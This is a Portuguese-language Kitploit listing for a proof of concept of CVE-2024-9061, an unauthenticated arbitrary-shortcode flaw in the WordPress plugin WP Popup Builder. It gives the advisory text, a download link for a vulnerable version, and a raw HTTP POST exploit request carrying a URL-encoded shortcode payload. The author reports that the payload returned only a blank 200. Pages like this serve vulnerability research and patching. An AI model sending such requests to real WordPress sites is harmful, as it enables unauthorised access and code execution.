Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-9061 — WP Popup Builder – Formulários de Popup e Geração de Leads de Marketing <= 1.3.5 - Execução Arbitrária de Shortcode Não Autenticada via wp_ajax_nopriv_shortcode_Api_Add | Kitploit
Ferramentas/GitHubGitHub/randomrobbiebf/cve-2024-9061
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubrandomrobbiebf/cve-2024-9061

CVE-2024-9061

WP Popup Builder – Formulários de Popup e Geração de Leads de Marketing <= 1.3.5 - Execução Arbitrária de Shortcode Não Autenticada via wp_ajax_nopriv_shortcode_Api_Add

Ver Repositório
3há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-9061

WP Popup Builder – Popup Forms and Marketing Lead Generation <= 1.3.5 - Execução Não Autenticada de Shortcode Arbitrário via wp_ajax_nopriv_shortcode_Api_Add

Descrição

O plugin WP Popup Builder – Popup Forms and Marketing Lead Generation para WordPress é vulnerável a execução arbitrária de shortcodes através da ação AJAX wp_ajax_nopriv_shortcode_Api_Add em todas as versões até, e incluindo, 1.3.5. Isso se deve ao software permitir que os usuários executem uma ação que não valida adequadamente um valor antes de executar do_shortcode. Isso possibilita que atacantes não autenticados executem shortcodes arbitrários. NOTA: Esta vulnerabilidade foi parcialmente corrigida na versão 1.3.5 com uma verificação de nonce, que efetivamente impediu o acesso à função afetada. No entanto, a versão 1.3.6 incorpora a verificação de autorização correta para impedir acesso não autorizado.

Eu tinha outro plugin instalado para execução de php para isso, mas nunca consegui executá-lo.

[xyz-ips snippet="test"]

Informações

root@kitploit:~
Type: plugin
CVSS Score: 7.3
CVE: CVE-2024-9061
Slug: wp-popup-builder
Download Link: Download [wp-popup-builder Version 1.3.2](https://downloads.wordpress.org/plugin/wp-popup-builder.1.3.2.zip)

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: curl/8.7.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Connection: keep-alive

action=shortcode_Api_Add&shortcode=%5b%78%79%7a%2d%69%70%73%20%73%6e%69%70%70%65%74%3d%22%74%65%73%74%22%5d

A resposta é um 200 em branco

Baixar ferramenta